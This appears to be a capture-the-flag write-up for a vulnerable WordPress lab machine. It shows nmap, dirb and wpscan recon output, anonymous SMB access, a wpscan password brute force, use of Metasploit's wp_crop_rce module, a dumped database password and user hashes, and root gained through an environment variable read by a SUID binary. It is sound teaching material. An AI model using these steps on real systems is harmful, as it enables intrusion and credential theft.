rizi85

App Sec / Red Teamer

5 minute read

Blog

Long story short is that Billy Joel made a Wordpress blog! Unfortunately not a very good configured one, making room for a lot of vulnerabilities.

Information gathering

Enumeration

nmap

Command:

nmap -sC -sV -A -p- 10.10.69.205

Results

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_  256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Billy Joel's IT Blog – The IT blog
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 5.0
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  p����U      Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2023-08-08T13:03:45+00:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-08-08T13:03:45
|_  start_date: N/A

dirb

Command:

dirb http://10.10.69.205

Results

---- Scanning URL: http://10.10.69.205/ ----
==> DIRECTORY: http://10.10.69.205/0/
+ http://10.10.69.205/admin (CODE:302|SIZE:0)
+ http://10.10.69.205/atom (CODE:301|SIZE:0)
+ http://10.10.69.205/dashboard (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.69.205/embed/
+ http://10.10.69.205/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.69.205/feed/
+ http://10.10.69.205/index.php (CODE:301|SIZE:0)
+ http://10.10.69.205/login (CODE:302|SIZE:0)

wpscan

Command:

wpscan --url http://blog.thm -e vp vt u dbe cb

Results

[+] URL: http://blog.thm/ [10.10.69.205]
[+] Started: Tue Aug  8 09:27:42 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://blog.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator>
 |  - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://blog.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: Version: 1.3

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug  8 09:28:10 2023
[+] Requests Done: 31
[+] Cached Requests: 7
[+] Data Sent: 7.862 KB
[+] Data Received: 252.255 KB
[+] Memory used: 259.324 MB
[+] Elapsed time: 00:00:27

Exploitation

Foothold

  1. List the SMB shares: ```sh smbclient -L 10.10.105.124 Password for [WORKGROUP\kali]:

     Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 BillySMB        Disk      Billy's local SMB Share
 IPC$            IPC       IPC Service (blog server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing.

 Server               Comment
 ---------            -------

 Workgroup            Master
 ---------            -------
 WORKGROUP            BLOG


2. Anon login to share and exfiltrate files
```sh
smbclient //10.10.105.124/BillySMB -U " "%" "

smb: \> ls
  .                                   D        0  Tue May 26 14:17:05 2020
  ..                                  D        0  Tue May 26 13:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 14:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 14:13:45 2020
  check-this.png                      N     3082  Tue May 26 14:13:43 2020
  1. In the blog there are two active users: kwheel, bjoel
  2. Using wpscan we can bruteforce the list of users and get: kwheel / cutiepie1 
    wpscan --url http://blog.thm -U user.txt -P /usr/share/wordlists/rockyou.txt
  3. Having the login we can use metasploit payload multi/http/wp_crop_rce and get a session. After we can check the wp-config.php file for DB connection ```sh // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define(‘DB_NAME’, ‘blog’);

/** MySQL database username */ define(‘DB_USER’, ‘wordpressuser’);

/** MySQL database password */ define(‘DB_PASSWORD’, ‘LittleYellowLamp90!@’);

/** MySQL hostname */ define(‘DB_HOST’, ‘localhost’);

/** Database Charset to use in creating database tables. */ define(‘DB_CHARSET’, ‘utf8’);

/** The Database Collate type. Don’t change this if in doubt. */ define(‘DB_COLLATE’, ‘’);

/** Custom FS Method */ define(‘FS_METHOD’, ‘direct’);


6. Spawn a shell in meterpreter with "shell" command and login to mysql:
```sh
mysql -h localhost -u wordpressuser -p
  1. Check the wp_users table and get content ```sh select * from wp_users; +—-+————+————————————+—————+——————————+———-+———————+———————+————-+—————+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +—-+————+————————————+—————+——————————+———-+———————+———————+————-+—————+ | 1 | bjoel | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel | nconkl1@outlook.com | | 2020-05-26 03:52:26 | | 0 | Billy Joel | | 3 | kwheel | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel | zlbiydwrtfjhmuuymk@ttirv.net | | 2020-05-26 03:57:39 | | 0 | Karen Wheeler | +—-+————+————————————+—————+——————————+———-+———————+———————+————-+—————+

```

Privilege escalation

  1. Checking the SUID bits we can fins a file /usr/sbin/checker
  2. Running strings on it we can check the logic and see there is a variable called admin based on which the role is set
  3. Set export attribute for variable to 1 export admin=1 and run the script again /usr/sbin/checker will give you root rights
  4. Get the root flag from /root/root.txt: [RootFlag]
  5. Search for user.txt file and you will get the correct one in location /media/usb
  6. Get the user flag: [UserFlag]

You may also enjoy

The dark side of emoji in AI security

100x100

10 minute read

In today’s digital world, emojis are more than playful pictograms, they’re part of our communication fabric. But what if these seemingly innocent icons were ...

Include machine on THM

100x100

6 minute read

The Include machine puts your server exploitation skills to the test. With a focus on server-side vulnerabilities, this challenge requires an understanding o...